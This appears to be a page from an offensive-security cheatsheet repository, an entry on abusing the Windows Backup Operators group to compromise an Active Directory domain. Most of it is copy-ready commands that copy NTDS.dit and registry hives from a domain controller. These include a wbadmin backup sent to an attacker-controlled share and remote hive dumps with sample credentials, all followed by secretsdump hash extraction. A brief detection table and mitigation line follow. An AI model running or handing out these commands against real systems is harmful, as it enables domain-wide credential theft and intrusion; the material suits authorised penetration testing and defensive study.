daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-49-abusing-backup-operators-group.md (4062B)


      1 ---
      2 title: "Attack #49 โ€” Abusing Backup Operators Group"
      3 description: "Members of Backup Operators have the SeBackupPrivilege and SeRestorePrivilege, which grants them the ability to read and write any file on the system โ€”โ€ฆ"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "privilege-escalation", "hashing"]
      7 tools: ["Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/๐ŸŸฃ Attack #49 โ€” Abusing Backup Operators Group.md"
     11 ---
     12 # ๐ŸŸฃ Attack #49 โ€” Abusing Backup Operators Group
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 Members of **Backup Operators** have the `SeBackupPrivilege` and `SeRestorePrivilege`, which grants them the ability to **read and write any file on the system** โ€” bypassing NTFS ACLs entirely. This means a Backup Operator can copy the NTDS.dit database and SYSTEM hive from a DC, extract all domain hashes offline, and achieve full domain compromise.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Membership in Backup Operators** | Provides SeBackupPrivilege + SeRestorePrivilege |
     27 | **Logon access to DC** | RDP or WinRM (Backup Operators can log on locally by default) |
     28 
     29 ***
     30 
     31 ## ๐Ÿ’ป Full Commands
     32 
     33 ```powershell
     34 # โ”€โ”€ Verify privileges โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     35 whoami /priv
     36 # SeBackupPrivilege  = Read any file
     37 # SeRestorePrivilege = Write any file
     38 
     39 # โ”€โ”€ Method 1: robocopy backup mode โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     40 robocopy /B C:\Windows\NTDS C:\Temp ntds.dit
     41 reg save HKLM\SYSTEM C:\Temp\SYSTEM
     42 
     43 # โ”€โ”€ Method 2: diskshadow + robocopy โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     44 # Create diskshadow script:
     45 echo "set context persistent nowriters" > script.txt
     46 echo "add volume C: alias mydrive" >> script.txt
     47 echo "create" >> script.txt
     48 echo "expose %mydrive% Z:" >> script.txt
     49 
     50 diskshadow /s script.txt
     51 robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
     52 
     53 # โ”€โ”€ Method 3: wbadmin (Windows Server Backup) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     54 wbadmin start backup -backuptarget:\\ATTACKER\share -include:C: -quiet
     55 # Then extract NTDS.dit from backup
     56 
     57 # โ”€โ”€ Parse offline โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     58 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile backup_op_dump
     59 ```
     60 
     61 ```bash
     62 # โ”€โ”€ Remote via reg.py (SeBackupPrivilege) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     63 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SAM' -o SAM
     64 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SYSTEM' -o SYSTEM
     65 reg.py corp.local/backup_user:'Password1'@DC01.corp.local save -keyName 'HKLM\SECURITY' -o SECURITY
     66 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
     67 ```
     68 
     69 ***
     70 
     71 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     72 
     73 | Event ID | Source | What to Look For |
     74 |---|---|---|
     75 | **4672** | Security Log | SeBackupPrivilege/SeRestorePrivilege assigned at logon |
     76 | **4663** | Security Log | Object access โ€” NTDS.dit file read |
     77 | **8222** | Security Log | Shadow copy created |
     78 
     79 ***
     80 
     81 ## ๐Ÿ”— Attack Chain Context
     82 
     83 ```
     84 [Backup Operators] โ”€โ”€โ†’ SeBackupPrivilege โ†’ read NTDS.dit โ†’ all domain hashes
     85          โ”‚
     86          โ”œโ”€โ”€โ†’ ๐Ÿ”— Bypass NTFS ACLs โ†’ copy any file including NTDS.dit
     87          โ”œโ”€โ”€โ†’ ๐Ÿ”— Offline parsing โ†’ no DCSync needed
     88          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: limit Backup Operators membership, monitor privilege use
     89 ```
     90 
     91 ***
     92 
     93 > โœ… **Attack #49 โ€” Backup Operators complete.**